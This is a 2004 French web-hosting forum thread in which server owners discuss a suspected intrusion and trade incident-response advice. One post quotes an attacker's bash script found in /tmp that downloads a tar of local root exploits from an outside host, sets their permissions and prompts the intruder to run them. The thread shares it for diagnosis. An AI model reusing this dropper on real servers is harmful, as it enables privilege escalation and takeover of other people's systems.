OVH Community, votre nouvel espace communautaire.

Une tentative de piratage ?

QM1 Timon

07/04/2004, 21h43

merci de vos réponses, j'ai aussi comme DAWEB des fichiers appartenant à nobody dans /tmp, plus d'acces ssh sous root ...... ça se complique non?
ou puis je chercher une trace d'intrusion plus apparente?
Tout ce qu'on trouve sur les keroot est tres instructif mais également décourageant .
Les raccoucis que j'avais crées vers mysql et phpmyadmin sont out ;+((((((((((( c'est désepérant.
J'ai installé simplement sur mon site un formulaire de contact, et chose plus sensible une interface de petites annonces "gadjo" mais le script avait l'air apparement protégé contre l'écriture de scritps.
Je serais vraiment curieux d'assister à une demo ou de trouver de la doc sur le sujet, merci à vous et bonne chance car apparement il en faut aussi...

netswitch

07/04/2004, 20h44

si tu commences a t'inquièter pour les lame servers resolving tu va pas t'en sortir, je dosi en avoir 3 à 400 par jour...

Daweb

07/04/2004, 11h21

Ces logs sont fréquents, j'en ai toujours eu des similaires.

Par contre ta seule chose en retard, c'est déja trop
Reboot ton serveur, sur Netbios, et hop terminé

QM1 Timon

07/04/2004, 00h32

BOnjour, le vocabulaire employé dans le script que tu montres est du portugais du brésil.
, j'ai moi de mon cote releve dans mes logs la chose suivante

Apr 6 07:06:40 ns30062 named[4492]: lame server resolving 'bucetaehbom.hanseo.ac.kr' (in 'hanseo.ac.kr'?): 127.0.0.1#53
Apr 6 10:07:12 ns30062 named[4492]: lame server resolving 'bucetaehbom.hanseo.ac.kr' (in 'hanseo.ac.kr'?): 127.0.0.1#53

Il y a apparement un pirate bresilien qui a pris ovh comme cible.je ne traduirais pas (bucetaehbom) trop vulgaire ici, mais dites moi comment mon serveur peut essayer de resoudre une adresse tout seul le matin à l'heure ou je suis encore au lit par le script ci dessus.
J'ai parcouru les differents logs je n'ai rien trouvé
J'ai tout patché comme indiqué par OVH une seule chose en retard la version 4.2.24 au lieu de 25 !

Merci de vos éclaircissements

Daweb

26/03/2004, 09h04

J'ai cherché et rien trouvé sur ma machine.
De plus celle çi est à jour des release OVH, elles sont installé le jour même.

Aucune utilisation depuis, rien de spécial, rien de crée, rien dans les logs depuis la création de ces dossiers qui sont restés dans tmp.

Blablabla

25/03/2004, 22h08

hello,

vu ce fichier je dirais que le haxor a eu un acces nobody à ton serveur web surement via une faille apache ou une faille php (include ou sql injection ...)

ensuite le monsieur a téléchargé une serie d'exploits locaux qui donnent acces root (exemple kernel do_brk do_brk2 ...)

les questions sont :

* a t-il obtenu l'acces root ? (mon avis : oui)
* a t-il installé un rootkit ? (mon avis : oui)
* utilise t-il ta machine pour des actions illégales ? (mon avis oui)

Trois conceils :

1) après une intrusion le formatage et l'isolation de la machine sont obligatoires.
2) vérifie s'il ya des rootkit sur ta machine (google ..)
3) inscrit toi à la mailing liste de k-otik ou bugtraq, ça te permet d'être au courant de toutes les failles de sécurité publiées, et donc patcher ta machines : http://www.k-otik.com/mailing http://www.securityfocus.com/archive/

---------------------
bon courage.

Daweb

24/03/2004, 18h51

Pour les pros, j'ai apparement subbit une tentative de piratage, sans dégats. J'ai évidement cherché dans les logs et changé le pass root.

Mais si quelqu'un a une idée...
Voila ce que j'ai, excepté des tentative de connexion en root échouées, sur Webmin échouées...

Dans /tmp, plusieurs fichiers vides crees en nobody.
Et surtout ce script que j'ai evidement supprimé :

Code:

#!/bin/bash
#
# F4ke-ScriptShell-Live versão 1.0 17/03/2004 - 16:26
#
# by: DelphiBoy
# Canal #F4keLive na BrasNet - irc.brasnet.org
#
#F4keLive#
echo 
#F4keLive#
echo F4ke-ScriptShell-Live v.1.0 17/03/2004 - 16:26
#F4keLive#
echo 
#F4keLive#
wget http://ernesto.ferro.k8.com.br/xpl/f4keroot.tar
#F4keLive#
echo
#F4keLive#
echo Descompactando .TAR...
#F4keLive#
echo 
#F4keLive#
tar -xvf f4keroot.tar
#F4keLive#
echo 
#F4keLive#
echo Apagando o .TAR...
#F4keLive#
echo 
#F4keLive#
rm f4keroot.tar
#F4keLive#
echo Aplicando CHMOD 7777...
#F4keLive#
chmod 7777 brk
#F4keLive#
chmod 7777 brk2
#F4keLive#
chmod 7777 km3
#F4keLive#
chmod 7777 local
#F4keLive#
chmod 7777 local24
#F4keLive#
chmod 7777 myptrace
#F4keLive#
echo 
#F4keLive#
echo Pronto, agora só rodar todos os locais e catar o root!
#F4keLive#
echo 
#F4keLive#
echo Os locais disponiveis no momento sao:
#F4keLive#
echo brk - brk2 - km3 - local - local24 - myptrace
#F4keLive#
echo 
#F4keLive#
echo Canal %F4keLive - irc.brasnet.org
#F4keLive#
echo F4ke-ScriptShell-Live by DelphiBoy
#F4keLive#
echo
#F4keLive#
echo NAO ESQUECA DO GREETZ PARA DELPHIBOY E/OU F4KELIVE
#F4keLive#
echo 
#F4keLive#
id;uname -a;cat /proc/version;cat /etc/issue.net
#F4keLive#

Voila si quelqu'un a une idée...